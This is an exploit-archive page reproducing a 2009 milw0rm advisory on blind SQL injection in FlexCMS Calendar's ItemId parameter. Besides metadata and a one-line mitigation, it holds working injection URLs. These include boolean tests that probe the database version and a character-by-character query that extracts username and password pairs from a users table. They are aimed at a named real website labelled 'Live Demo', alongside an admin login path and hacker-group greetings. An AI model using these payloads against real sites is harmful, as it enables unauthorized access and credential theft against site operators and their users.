header-logo
Suggest Exploit
vendor:
FlexCMS Calendar
by:
MisterRichard
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: FlexCMS Calendar
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FlexCMS Calendar(ItemId) Blind SQL Injection Vulnerability

A vulnerability exists in FlexCMS Calendar(ItemId) which allows an attacker to inject malicious SQL queries into the application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can exploit this vulnerability to gain access to the application and its data.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*****************************************************************************
*							                    *
*          FlexCMS Calendar(ItemId) Blind SQL Injection Vulnerability       *
*							                    *
*****************************************************************************
AUTHOR: MisterRichard
Developer site: http://www.flexcms.dk/
Admin login site:
http://target.com/flexadmin/
***************************************

[=] Vulnerability author : Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site : www.khg-crew.ws
[=] Greetz: SpYrO , boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , LiTTlE-HaCkEr , L1R1D0N1
[=]        -=[Kosova Hackers Group]=--=[KHG-Crew]=-

***************************************
[=] Example    : /flx/aktiviteter/kalender/?ItemId={SQL}

		 http://www.radikalungdom.dk/flx/aktiviteter/kalender/?ItemId=1%20and%20substring(@@version,1,1)=4  >>FALSE

[=] Live Demo: 	http://www.radikalungdom.dk/flx/aktiviteter/kalender/?ItemId=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>95
		
		 http://www.radikalungdom.dk/flx/aktiviteter/kalender/?ItemId=1%20and%20substring(@@version,1,1)=5  >>TRUE
***************************************

[=] Proud 2 be Albanian
[=] Proud 2 be Muslim
[=] United States of Albania

***************************************

# milw0rm.com [2009-04-06]

Navigation

Suggest Exploit

Services By CQR